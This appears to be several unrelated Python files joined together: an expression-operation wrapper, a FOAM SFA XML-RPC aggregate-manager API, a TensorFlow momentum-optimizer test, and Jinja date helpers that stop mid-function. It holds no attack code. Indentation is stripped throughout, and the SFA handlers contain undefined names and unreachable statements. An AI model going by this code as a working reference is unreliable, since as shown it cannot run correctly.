if len(return_value) == 1 and 'return' in return_value:
# Single output
return return_value['return']
else:
# Multiple outputs
return return_value
run_executable.__name__ = op_meta_info.qualified_name
run_executable.__doc__ = op_meta_info.header.get('description')
return Operation(run_executable, op_meta_info=op_meta_info)
def new_expression_op(op_meta_info: OpMetaInfo, expression: str) -> Operation:
"""
Create an operation that wraps a Python expression.
:param op_meta_info: Meta-information about the resulting operation and the operation's inputs and outputs.
:param expression: The Python expression. May refer to any name given in *op_meta_info.input*.
:return: The Python expression wrapped into an operation.
"""
if not op_meta_info:
raise ValueError('op_meta_info must be given')
if not expression:
raise ValueError('expression must be given')
def eval_expression(**kwargs):
return safe_eval(expression, local_namespace=kwargs)
inputs = OrderedDict(op_meta_info.inputs)
outputs = OrderedDict(op_meta_info.outputs)
if len(outputs) == 0:
outputs[_RETURN] = {}
op_meta_info = OpMetaInfo(op_meta_info.qualified_name,
has_monitor=op_meta_info.has_monitor,
header=dict(op_meta_info.header),
inputs=inputs,
outputs=outputs)
eval_expression.__name__ = op_meta_info.qualified_name
eval_expression.__doc__ = op_meta_info.header.get('description')
return Operation(eval_expression, op_meta_info=op_meta_info)
|
|
import os
import sys
import random
#legacy optin imports
#from foam.ethzlegacyoptinstuff.legacyoptin.xmlrpcmodels import CallBackServerProxy, FVServerProxy
from foam.ethzlegacyoptinstuff.legacyoptin.optsmodels import Experiment, ExperimentFLowSpace #,\
#UserOpts, OptsFlowSpace, MatchStruct
from foam.ethzlegacyoptinstuff.legacyoptin.flowspaceutils import dotted_ip_to_int, mac_to_int,\
int_to_dotted_ip, int_to_mac, parseFVexception
#foam general imports
import logging
import zlib
import base64
import xmlrpclib
from xml.parsers.expat import ExpatError
import jsonrpc
from flaskext.xmlrpc import XMLRPCHandler, Fault
from flask import request
import foam.task
import foam.lib
import foam.api.xmlrpc
import foam.version
from foam.creds import CredVerifier, Certificate
from foam.config import AUTO_SLIVER_PRIORITY, GAPI_REPORTFOAMVERSION
from foam.core.configdb import ConfigDB
from foam.core.log import KeyAdapter
#GENI API imports
from foam.geni.db import GeniDB, UnknownSlice, UnknownNode
import foam.geni.approval
import foam.geni.ofeliaapproval
import foam.geni.lib
import sfa
#FV import
from foam.flowvisor import Connection as FV
from pprint import pprint
import json
import httplib,urllib,base64
THIS_SITE_TAG = ConfigDB.getConfigItemByKey("geni.site-tag").getValue()
from foam.geni.codes import GENI_ERROR_CODE
from foam.ethzlegacyoptinstuff.api_exp_to_rspecv3.expdatatogeniv3rspec import create_ofv3_rspec
from foam.sfa.drivers.OFSfaDriver import OFSfaDriver
from foam.sfa.sfa_config import config as CONFIG
from foam.sfa.methods.permission_manager import PermissionManager
from foam.sfa.lib import get_slice_details_from_slivers, getAdvertisement
def _same(val):
return "%s" % val
class SfaApi(foam.api.xmlrpc.Dispatcher):
def __init__ (self, log):
super(SfaApi, self).__init__("sfaapi", log)
self._actionLog = KeyAdapter("expedient-sfa", logging.getLogger('sfaapi-actions'))
#retrieve updated dict as a json file from foam db folder
filedir = './opt/ofelia/ofam/local/db'
filename = os.path.join(filedir, 'expedient_slices_info.json')
if os.path.isfile(filename):
f = open(filename, 'r')
self.slice_info_dict = json.load(f)
f.close()
else:
self.slice_info_dict = {}
#if ConfigDB.getConfigItemByKey("flowvisor.hostname").getValue() is None:
self.switch_dpid_list = None
self.link_list = None
self.callback_http_attr_list = [] #we have multiple expedients communicating with foam!
self.callback_cred_attr_list = [] #we have multiple expedients communicating with foam!
self.driver = OFSfaDriver()
self.pm = PermissionManager()
def pub_GetVersion(self,api=None,options={}):
#FIXME: SFA seems not accept the error GENI structure when exceptions are rised.
version = {'urn':CONFIG.URN,
'hostname':CONFIG.HOSTNAME,
'code_tag':CONFIG.CODE_TAG,
'hrn':CONFIG.HRN,
'testbed':CONFIG.TESTBED,
'geni_api_versions': CONFIG.GENI_API_VERSIONS,
'interface':CONFIG.INTERFACE,
'geni_api':int(CONFIG.GENI_API_VERSION),
'geni_ad_rspec_versions': CONFIG.GENI_AD_RSPEC_VERSIONS,
'code_url': CONFIG.CODE_URL,
'geni_request_rspec_versions': CONFIG.GENI_REQUEST_RSPEC_VERSIONS,
'sfa':int(CONFIG.SFA_VERSION),
#F4F required params
'f4f_describe_testbed':CONFIG.DESCRIBE_TESTBED,
'f4f_testbed_homepage':CONFIG.TESTBED_HOMEPAGE,
'f4f_testbed_picture':CONFIG.TESTBED_PICTURE,
'f4f_endorsed_tools':CONFIG.ENDORSED_TOOLS,
}
return self.buildPropertyList(GENI_ERROR_CODE.SUCCESS, value=version)
def pub_ListResources(self,creds=[],options={}):
self.pm.check_permissions('ListResources',locals())
slice_xrn = options.get('geni_slice_urn', None)
propertyList = None
if slice_xrn:
xrn = Xrn(slice_xrn,'slice')
slice_urn = xrn.get_urn()
slice_leaf = xrn.get_leaf()
options['slice'] = slice_leaf
else:
slice_leaf = None
slice_urn = None
try:
rspec = self.driver.list_resources(slice_urn,slice_leaf,options)
if options.has_key('geni_compressed') and options['geni_compressed'] == True:
rspec = zlib.compress(rspec).encode('base64')
propertyList = self.buildPropertyList(GENI_ERROR_CODE.SUCCESS, value=rspec)
except ExpatError:
msg = "Error parsing credential strings"
propertyList = self.buildPropertyList(GENI_ERROR_CODE.BADARGS, output=msg)
self._log.error(msg)
except UnknownSlice as x:
# Raised by GeniDB.getSliverURN()
msg = "Attempt to list resources on sliver for unknown slice %s" % (urn)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.ERROR, output=msg)
x.log(self._log, msg, logging.INFO)
except xmlrpclib.Fault as x:
# Something thrown via GCF, we'll presume it was something related to credentials
msg = "GCF credential check failure: <%s>" % (x)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.ERROR, output=msg)
self._log.info(msg)
self._log.debug(x, exc_info=True)
except AttributeError as x:
# New GCF problem with user creds that have no gid_caller, probably
msg = "GCF credential check failure: <%s>" % (x)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.ERROR, output=msg)
self._log.info(msg)
self._log.debug(x, exc_info=True)
except Exception as e:
msg = "Exception: %s" % str(e)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.ERROR, output=msg)
self._log.exception(msg)
self._log.info(propertyList)
return propertyList
def pub_CreateSliver(self, slice_xrn, creds, rspec, users, options):
"""Allocate resources to a slice
Reserve the resources described in the given RSpec for the given slice, returning a manifest RSpec of what has been reserved.
"""
try:
self.pm.check_permissions('CreateSliver',locals())
except Exception as e:
return self.buildPropertyList(GENI_ERROR_CODE.CREDENTIAL_INVALID, output=e)
self.recordAction("createsliver", creds, slice_xrn)
user_info = {}
user_info["urn"] = None
user_info["email"] = None
request.environ.pop("CLIENT_RAW_CERT",None)
sliver = foam.geni.lib.createSliver(slice_xrn, creds, rspec, user_info)
try:
approve = foam.geni.approval.analyzeForApproval(sliver)
style = ConfigDB.getConfigItemByKey("geni.approval.approve-on-creation").getValue()
if style == foam.geni.approval.NEVER:
approve = False
elif style == foam.geni.approval.ALWAYS:
approve = True
if approve:
pid = foam.task.approveSliver(sliver.getURN(), self._auto_priority)
data = GeniDB.getSliverData(sliver.getURN(), True)
#foam.task.emailCreateSliver(data)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.SUCCESS, value=GeniDB.getManifest(sliver.getURN()))
except foam.geni.lib.RspecParseError as e:
msg = str(e)
self._log.info(e)
return msg
propertyList = self.buildPropertyList(GENI_ERROR_CODE.BADARGS, output=msg)
except foam.geni.lib.RspecValidationError as e:
self._log.info(e)
msg = str(e)
return msg
propertyList = self.buildPropertyList(GENI_ERROR_CODE.BADARGS, output=msg)
except foam.geni.lib.DuplicateSliver as ds:
msg = "Attempt to create multiple slivers for slice [%s]" % (ds.slice_urn)
self._log.info(msg)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.ERROR, output=msg)
except foam.geni.lib.UnknownComponentManagerID as ucm:
msg = "Component Manager ID specified in %s does not match this aggregate." % (ucm.cid)
self._log.info(msg)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.ERROR, output=msg)
except (foam.geni.lib.UnmanagedComponent, UnknownNode) as uc:
msg = "DPID in component %s is unknown to this aggregate." % (uc.cid)
self._log.info(msg)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.ERROR, output=msg)
except Exception as e:
msg = "Exception %s" % str(e)
self._log.info(e)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.ERROR, output=msg)
finally:
return propertyList
def pub_DeleteSliver(self, xrn, creds, options={}):
"""Delete a sliver
Stop all the slice's resources and remove the reservation.
Returns True or False indicating whether it did this successfully.
"""
try:
self.pm.check_permissions('DeleteSliver',locals())
except Exception as e:
return self.buildPropertyList(GENI_ERROR_CODE.CREDENTIAL_INVALID, output=e)
self._log.info("Is HERE:")
try:
slivers = GeniDB.getSliverList()
self._log.info("Is HERE:")
sliver = get_slice_details_from_slivers(slivers, xrn)
self._log.info("Deleteing Sliver")
self._log.info(sliver["slice_urn"])
data = GeniDB.getSliverData(sliver["sliver_urn"], True)
foam.geni.lib.deleteSliver(sliver_urn = sliver["sliver_urn"])
#foam.task.emailGAPIDeleteSliver(data)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.SUCCESS, value=True)
except UnknownSlice as e:
propertyList = self.buildPropertyList(GENI_ERROR_CODE.SEARCHFAILED, output=msg)
except Exception as e:
msg = "Exception: %s" % str(e)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.ERROR, output=msg)
finally:
return propertyList
def pub_RenewSliver(self,slice_xrn=None, creds=[], expiration_time=None, options={}):
try:
self.pm.check_permissions('Start',locals())
except Exception as e:
return self.buildPropertyList(GENI_ERROR_CODE.CREDENTIAL_INVALID, output=e)
try:
sliver_urn = foam.lib.renewSliver(slice_xrn, creds, expiration_time)
data = GeniDB.getSliverData(sliver_xrn, True)
#foam.task.emailRenewSliver(data)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.SUCCESS, value=True)
except foam.lib.BadSliverExpiration as e:
msg = "Bad expiration request: %s" % (e.msg)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.ERROR, output=msg)
e.log(self._log, msg, logging.INFO)
except Exception as e:
msg = "Exception: %s" %str(e)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.ERROR, output=msg)
self._log.exception(msg)
finally:
return propertyList
def pub_Start(self,xrn, creds):
try:
self.pm.check_permissions('Start',locals())
except Exception as e:
return self.buildPropertyList(GENI_ERROR_CODE.CREDENTIAL_INVALID, output=e)
xrn = Xrn(xrn)
slice_urn = xrn.get_urn()
slice_leaf = xrn.get_leaf()
authority = xrn.get_authority_hrn()
return self.buildPropertyList(GENI_ERROR_CODE.SUCCESS, value=True)
def pub_Stop(self,xrn, creds):
try:
self.pm.check_permissions('Start',locals())
except Exception as e:
return self.buildPropertyList(GENI_ERROR_CODE.CREDENTIAL_INVALID, output=e)
xrn = Xrn(xrn)
slice_urn = xrn.get_urn()
slice_leaf = xrn.get_leaf()
authority = xrn.get_authority_hrn()
return self.buildPropertyList(GENI_ERROR_CODE.SUCCESS, value=True)
def pub_reset_slice(self, xrn):
xrn = Xrn(xrn)
slice_urn = xrn.get_urn()
slice_leaf = xrn.get_leaf()
authority = xrn.get_authority_hrn()
return self.buildPropertyList(GENI_ERROR_CODE.SUCCESS, value=True)
def pub_GetTicket(self, api, xrn, creds, rspec, users, options):
# ticket is dead.
raise 'Method GetTicket was deprecated.'
def pub_SliverStatus (self, slice_xrn=None, creds=[], options={}):
try:
self.pm.check_permissions('SliverStatus',locals())
except Exception as e:
return self.buildPropertyList(GENI_ERROR_CODE.CREDENTIAL_INVALID, output=e)
try:
slivers = GeniDB.getSliverList()
try:
sliver = get_slice_details_from_slivers(slivers, slice_xrn)
except:
raise Exception("Sliver for slice URN (%s) does not exist" % (slice_xrn))
result= dict()
result["slice_urn"] = slice_xrn
result["sliver_urn"] = sliver["sliver_urn"]
result["status"] = sliver["status"]
result["created"] = sliver["creation"]
result["description"] = sliver["desc"]
result["expires"] = sliver["expiration"]
propertyList = self.buildPropertyList(GENI_ERROR_CODE.SUCCESS, value=result)
except UnknownSlice as e:
msg = "Attempt to get status on unknown sliver for slice %s" % (slice_xrn)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.SEARCHFAILED, output=msg)
e.log(self._log, msg, logging.INFO)
except Exception as e:
msg = "Exception: %s" % str(e)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.ERROR, output=msg)
self._log.exception(msg)
finally:
return propertyList
def pub_Ping(self, message):
return message
def buildPropertyList(self, geni_code, value="", output=""):
#{'output': '', 'geni_api': 2, 'code': {'am_type': 'sfa', 'geni_code': 0}, 'value': rspec}
result = {}
result["geni_api"] = 2
result["code"] = {'geni_code': geni_code , "am_type":"sfa"}
# Non-zero geni_code implies error: output is required, value is optional
if geni_code:
result["output"] = output
if value:
result["value"] = value
# Zero geni_code implies success: value is required, output is optional
else:
result["value"] = value
return result
def recordAction (self, action, credentials = [], urn = None):
cred_ids = []
self._actionLog.info("Sliver: %s LegExpAPI Action: %s" % (urn, action))
for cred in credentials:
self._actionLog.info("Credential: %s" % (cred))
def setup (app):
sfa_api = XMLRPCHandler('sfaapi')
sfa_api.connect(app, '/sfa/2/')
sfa_api.register_instance(SfaApi(app.logger))
app.logger.info("[SfaApi] Loaded.")
return sfa_api
|
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Momentum."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.python.platform
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
class MomentumOptimizerTest(tf.test.TestCase):
def testBasic(self):
with self.test_session():
var0 = tf.Variable([1.0, 2.0])
var1 = tf.Variable([3.0, 4.0])
grads0 = tf.constant([0.1, 0.1])
grads1 = tf.constant([0.01, 0.01])
mom_opt = tf.train.MomentumOptimizer(learning_rate=2.0, momentum=0.9)
mom_update = mom_opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
# Check we have slots
self.assertEqual(["momentum"], mom_opt.get_slot_names())
slot0 = mom_opt.get_slot(var0, "momentum")
self.assertEquals(slot0.get_shape(), var0.get_shape())
self.assertFalse(slot0 in tf.trainable_variables())
slot1 = mom_opt.get_slot(var1, "momentum")
self.assertEquals(slot1.get_shape(), var1.get_shape())
self.assertFalse(slot1 in tf.trainable_variables())
# Fetch params to validate initial values
self.assertAllClose([1.0, 2.0], var0.eval())
self.assertAllClose([3.0, 4.0], var1.eval())
# Step 1: the momentum accumulators where 0. So we should see a normal
# update: v -= grad * learning_rate
mom_update.run()
# Check that the momentum accumulators have been updated.
self.assertAllClose(np.array([0.1, 0.1]), slot0.eval())
self.assertAllClose(np.array([0.01, 0.01]), slot1.eval())
# Check that the parameters have been updated.
self.assertAllClose(np.array([1.0 - (0.1 * 2.0),
2.0 - (0.1 * 2.0)]),
var0.eval())
self.assertAllClose(np.array([3.0 - (0.01 * 2.0),
4.0 - (0.01 * 2.0)]),
var1.eval())
# Step 2: the momentum accumulators contain the previous update.
mom_update.run()
# Check that the momentum accumulators have been updated.
self.assertAllClose(np.array([(0.9 * 0.1 + 0.1), (0.9 * 0.1 + 0.1)]),
slot0.eval())
self.assertAllClose(np.array([(0.9 * 0.01 + 0.01), (0.9 * 0.01 + 0.01)]),
slot1.eval())
# Check that the parameters have been updated.
self.assertAllClose(
np.array([1.0 - (0.1 * 2.0) - ((0.9 * 0.1 + 0.1) * 2.0),
2.0 - (0.1 * 2.0) - ((0.9 * 0.1 + 0.1) * 2.0)]),
var0.eval())
self.assertAllClose(np.array([2.98 - ((0.9 * 0.01 + 0.01) * 2.0),
3.98 - ((0.9 * 0.01 + 0.01) * 2.0)]),
var1.eval())
def testTensorLearningRateAndMomentum(self):
with self.test_session():
var0 = tf.Variable([1.0, 2.0])
var1 = tf.Variable([3.0, 4.0])
grads0 = tf.constant([0.1, 0.1])
grads1 = tf.constant([0.01, 0.01])
mom_opt = tf.train.MomentumOptimizer(
learning_rate=tf.constant(2.0), momentum=tf.constant(0.9))
mom_update = mom_opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
# Check we have slots
self.assertEqual(["momentum"], mom_opt.get_slot_names())
slot0 = mom_opt.get_slot(var0, "momentum")
self.assertEquals(slot0.get_shape(), var0.get_shape())
self.assertFalse(slot0 in tf.trainable_variables())
slot1 = mom_opt.get_slot(var1, "momentum")
self.assertEquals(slot1.get_shape(), var1.get_shape())
self.assertFalse(slot1 in tf.trainable_variables())
# Fetch params to validate initial values
self.assertAllClose([1.0, 2.0], var0.eval())
self.assertAllClose([3.0, 4.0], var1.eval())
# Step 1: the momentum accumulators where 0. So we should see a normal
# update: v -= grad * learning_rate
mom_update.run()
# Check that the momentum accumulators have been updated.
self.assertAllClose(np.array([0.1, 0.1]), slot0.eval())
self.assertAllClose(np.array([0.01, 0.01]), slot1.eval())
# Check that the parameters have been updated.
self.assertAllClose(np.array([1.0 - (0.1 * 2.0),
2.0 - (0.1 * 2.0)]),
var0.eval())
self.assertAllClose(np.array([3.0 - (0.01 * 2.0),
4.0 - (0.01 * 2.0)]),
var1.eval())
# Step 2: the momentum accumulators contain the previous update.
mom_update.run()
# Check that the momentum accumulators have been updated.
self.assertAllClose(np.array([(0.9 * 0.1 + 0.1), (0.9 * 0.1 + 0.1)]),
slot0.eval())
self.assertAllClose(np.array([(0.9 * 0.01 + 0.01), (0.9 * 0.01 + 0.01)]),
slot1.eval())
# Check that the parameters have been updated.
self.assertAllClose(
np.array([1.0 - (0.1 * 2.0) - ((0.9 * 0.1 + 0.1) * 2.0),
2.0 - (0.1 * 2.0) - ((0.9 * 0.1 + 0.1) * 2.0)]),
var0.eval())
self.assertAllClose(np.array([2.98 - ((0.9 * 0.01 + 0.01) * 2.0),
3.98 - ((0.9 * 0.01 + 0.01) * 2.0)]),
var1.eval())
def testFloat64(self):
with self.test_session():
opt = tf.train.MomentumOptimizer(learning_rate=2.0, momentum=0.9)
# compute_gradients.
values = [1.0, 3.0]
good_vars = [tf.Variable([v]) for v in values]
bad_loss = tf.constant(2.0, tf.float64, name="bad_loss")
self.assertRaisesRegexp(
ValueError, r"Invalid type.*float64.*bad_loss.*expected.*float32",
opt.compute_gradients, bad_loss, good_vars)
bad_vars = [
tf.Variable(np.array([v], np.float64), name="bad_var")
for v in values]
self.assertRaisesRegexp(
ValueError, r"Invalid type.*float64.*bad_var.*expected.*float32",
opt.compute_gradients, tf.cast(bad_vars[0] + bad_vars[1], tf.float32),
bad_vars)
opt.compute_gradients(good_vars[0] + good_vars[1], good_vars)
# apply_gradients.
bad_grads = [
tf.constant([0.1], dtype=np.float64, name="bad_grad"),
tf.constant([0.01])]
self.assertRaisesRegexp(
ValueError, r"Invalid type.*float64.*bad_grad.*expected.*float32",
opt.apply_gradients, zip(bad_grads, good_vars))
good_grads = [tf.constant([0.01]), tf.constant([0.02])]
self.assertRaisesRegexp(
ValueError, r"Invalid type.*float64.*bad_var.*expected.*float32",
opt.apply_gradients, zip(good_grads, bad_vars))
opt.apply_gradients(zip(good_grads, good_vars))
def _dbParamsMom01(self):
"""Return dist-belief momentum values.
Return values been generated from the dist-belief momentum unittest,
running with a learning rate of 0.1 and a momentum of 0.1.
These values record how a parameter vector of size 10, initialized with 0.0,
gets updated with 10 consecutive momentum steps. It uses random gradients.
Returns:
db_grad: The gradients to apply
db_out: The parameters after the momentum update.
"""
db_grad = [[]] * 10
db_out = [[]] * 10
# pylint: disable=line-too-long
db_grad[0] = [0.00096264342, 0.17914793, 0.93945462, 0.41396621, 0.53037018, 0.93197989, 0.78648776, 0.50036013, 0.55345792, 0.96722615]
db_out[0] = [-9.6264346e-05, -0.017914793, -0.093945466, -0.041396622, -0.053037018, -0.093197994, -0.078648776, -0.050036013, -0.055345792, -0.096722618]
db_grad[1] = [0.17075552, 0.88821375, 0.20873757, 0.25236958, 0.57578111, 0.15312378, 0.5513742, 0.94687688, 0.16012503, 0.22159521]
db_out[1] = [-0.017181443, -0.10852765, -0.12421377, -0.070773244, -0.11591884, -0.11783017, -0.14165108, -0.14972731, -0.076892875, -0.1285544]
db_grad[2] = [0.35077485, 0.47304362, 0.44412705, 0.44368884, 0.078527533, 0.81223965, 0.31168157, 0.43203235, 0.16792089, 0.24644311]
db_out[2] = [-0.053967446, -0.1648933, -0.1716533, -0.1180798, -0.13005978, -0.20151734, -0.17911947, -0.20289968, -0.095839672, -0.15638189]
db_grad[3] = [0.9694621, 0.75035888, 0.28171822, 0.83813518, 0.53807181, 0.3728098, 0.81454384, 0.03848977, 0.89759839, 0.93665648]
db_out[3] = [-0.15459226, -0.24556576, -0.20456907, -0.20662397, -0.18528105, -0.24716705, -0.2643207, -0.21206589, -0.18749419, -0.2528303]
db_grad[4] = [0.38578293, 0.8536852, 0.88722926, 0.66276771, 0.13678469, 0.94036359, 0.69107032, 0.81897682, 0.5433259, 0.67860287]
db_out[4] = [-0.20323303, -0.33900154, -0.29658359, -0.28175515, -0.20448165, -0.34576839, -0.34194785, -0.29488021, -0.25099224, -0.33033544]
db_grad[5] = [0.27885768, 0.76100707, 0.24625534, 0.81354135, 0.18959245, 0.48038563, 0.84163809, 0.41172323, 0.83259648, 0.44941229]
db_out[5] = [-0.23598288, -0.42444581, -0.33041057, -0.3706224, -0.22536094, -0.40366709, -0.43387437, -0.34433398, -0.34060168, -0.38302717]
db_grad[6] = [0.27233034, 0.056316052, 0.5039115, 0.24105175, 0.35697976, 0.75913221, 0.73577434, 0.16014607, 0.57500273, 0.071136251]
db_out[6] = [-0.26649091, -0.43862185, -0.38418442, -0.40361428, -0.26314685, -0.48537019, -0.51664448, -0.36529395, -0.40706289, -0.39540997]
db_grad[7] = [0.58697265, 0.2494842, 0.08106143, 0.39954534, 0.15892942, 0.12683646, 0.74053431, 0.16033, 0.66625422, 0.73515922]
db_out[7] = [-0.32823896, -0.46498787, -0.39766794, -0.446868, -0.28281838, -0.50622416, -0.59897494, -0.38342294, -0.48033443, -0.47016418]
db_grad[8] = [0.8215279, 0.41994119, 0.95172721, 0.68000203, 0.79439718, 0.43384039, 0.55561525, 0.22567581, 0.93331909, 0.29438227]
db_out[8] = [-0.41656655, -0.50961858, -0.49418902, -0.51919359, -0.36422527, -0.55169362, -0.6627695, -0.40780342, -0.58099347, -0.50707781]
db_grad[9] = [0.68297005, 0.67758518, 0.1748755, 0.13266537, 0.70697063, 0.055731893, 0.68593478, 0.50580865, 0.12602448, 0.093537711]
db_out[9] = [-0.49369633, -0.58184016, -0.52132869, -0.5396927, -0.44306302, -0.56181377, -0.73774242, -0.46082234, -0.60366184, -0.52012295]
# pylint: enable=line-too-long
return db_grad, db_out
def testLikeDistBeliefMom01(self):
with self.test_session():
db_grad, db_out = self._dbParamsMom01()
num_samples = len(db_grad)
var0 = tf.Variable([0.0] * num_samples)
grads0 = tf.constant([0.0] * num_samples)
mom_opt = tf.train.MomentumOptimizer(learning_rate=0.1, momentum=0.1)
mom_update = mom_opt.apply_gradients(zip([grads0], [var0]))
tf.initialize_all_variables().run()
for i in xrange(num_samples):
mom_update.run(feed_dict={grads0: db_grad[i]})
self.assertAllClose(np.array(db_out[i]), var0.eval())
def testSparse(self):
with self.test_session():
var0 = tf.Variable(tf.zeros([4, 2]))
var1 = tf.Variable(
tf.constant(1.0, tf.float32, [4, 2]))
grads0 = tf.IndexedSlices(tf.constant([[.1, .1]]),
tf.constant([1]),
tf.constant([4, 2]))
grads1 = tf.IndexedSlices(tf.constant([[.01, .01], [.01, .01]]),
tf.constant([2, 3]),
tf.constant([4, 2]))
mom_opt = tf.train.MomentumOptimizer(learning_rate=2.0, momentum=0.9)
mom_update = mom_opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
# Check we have slots
self.assertEqual(["momentum"], mom_opt.get_slot_names())
slot0 = mom_opt.get_slot(var0, "momentum")
self.assertEquals(slot0.get_shape(), var0.get_shape())
slot1 = mom_opt.get_slot(var1, "momentum")
self.assertEquals(slot1.get_shape(), var1.get_shape())
# Fetch params to validate initial values
self.assertAllClose([0, 0], var0.eval()[0])
self.assertAllClose([0, 0], var0.eval()[1])
self.assertAllClose([1, 1], var1.eval()[2])
# Step 1: the momentum accumulators are 0. So we should see a normal
# update: v -= grad * learning_rate
mom_update.run()
# Check that the momentum accumulators have been updated.
self.assertAllClose(np.array([0, 0]), slot0.eval()[0])
self.assertAllClose(np.array([.1, .1]), slot0.eval()[1])
self.assertAllClose(np.array([.01, .01]), slot1.eval()[2])
# Check that the parameters have been updated.
self.assertAllClose(np.array([0, 0]), var0.eval()[0])
self.assertAllClose(np.array([- (0.1 * 2.0),
- (0.1 * 2.0)]),
var0.eval()[1])
self.assertAllClose(np.array([1.0 - (0.01 * 2.0),
1.0 - (0.01 * 2.0)]),
var1.eval()[2])
# Step 2: the momentum accumulators contain the previous update.
mom_update.run()
# Check that the momentum accumulators have been updated.
self.assertAllClose(np.array([0, 0]), slot0.eval()[0])
self.assertAllClose(np.array([(0.9 * 0.1 + 0.1),
(0.9 * 0.1 + 0.1)]),
slot0.eval()[1])
self.assertAllClose(np.array([(0.9 * 0.01 + 0.01),
(0.9 * 0.01 + 0.01)]),
slot1.eval()[2])
# Check that the parameters have been updated.
self.assertAllClose(np.array([0, 0]), var0.eval()[0])
self.assertAllClose(
np.array([- (0.1 * 2.0) - ((0.9 * 0.1 + 0.1) * 2.0),
- (0.1 * 2.0) - ((0.9 * 0.1 + 0.1) * 2.0)]),
var0.eval()[1])
self.assertAllClose(np.array([0.98 - ((0.9 * 0.01 + 0.01) * 2.0),
0.98 - ((0.9 * 0.01 + 0.01) * 2.0)]),
var1.eval()[2])
def testSharing(self):
with self.test_session():
var0 = tf.Variable([1.0, 2.0])
var1 = tf.Variable([3.0, 4.0])
grads0 = tf.constant([0.1, 0.1])
grads1 = tf.constant([0.01, 0.01])
mom_opt = tf.train.MomentumOptimizer(learning_rate=2.0, momentum=0.9)
mom_update1 = mom_opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
mom_update2 = mom_opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
self.assertEqual(["momentum"], mom_opt.get_slot_names())
slot0 = mom_opt.get_slot(var0, "momentum")
self.assertEquals(slot0.get_shape(), var0.get_shape())
slot1 = mom_opt.get_slot(var1, "momentum")
self.assertEquals(slot1.get_shape(), var1.get_shape())
# Fetch params to validate initial values
self.assertAllClose([1.0, 2.0], var0.eval())
self.assertAllClose([3.0, 4.0], var1.eval())
# Step 1: the momentum accumulators where 0. So we should see a normal
# update: v -= grad * learning_rate
mom_update1.run()
# Check that the momentum accumulators have been updated.
self.assertAllClose(np.array([0.1, 0.1]), slot0.eval())
self.assertAllClose(np.array([0.01, 0.01]), slot1.eval())
# Check that the parameters have been updated.
self.assertAllClose(np.array([1.0 - (0.1 * 2.0),
2.0 - (0.1 * 2.0)]),
var0.eval())
self.assertAllClose(np.array([3.0 - (0.01 * 2.0),
4.0 - (0.01 * 2.0)]),
var1.eval())
# Step 2: the second momentum accumulators contain the previous update.
mom_update2.run()
# Check that the momentum accumulators have been updated.
self.assertAllClose(np.array([(0.9 * 0.1 + 0.1), (0.9 * 0.1 + 0.1)]),
slot0.eval())
self.assertAllClose(np.array([(0.9 * 0.01 + 0.01), (0.9 * 0.01 + 0.01)]),
slot1.eval())
# Check that the parameters have been updated.
self.assertAllClose(
np.array([1.0 - (0.1 * 2.0) - ((0.9 * 0.1 + 0.1) * 2.0),
2.0 - (0.1 * 2.0) - ((0.9 * 0.1 + 0.1) * 2.0)]),
var0.eval())
self.assertAllClose(np.array([2.98 - ((0.9 * 0.01 + 0.01) * 2.0),
3.98 - ((0.9 * 0.01 + 0.01) * 2.0)]),
var1.eval())
if __name__ == "__main__":
tf.test.main()
|
|
from __future__ import division
from jinja2 import Environment, FileSystemLoader
from amonone.core import settings
from amonone.web.settings import TEMPLATES_DIR
from amonone import __version__
from datetime import datetime, time
from amonone.utils.dates import (
utc_unixtime_to_localtime,
dateformat_local,
dateformat,
timeformat
)
from amonone.web.libs.jinja2htmlcompress import SelectiveHTMLCompress
import re
try:
import json
except:
import simplejson as json
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
'''
Returns the age as a string
'''
if since_date is None:
since_date = datetime.now(target_tz)
distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
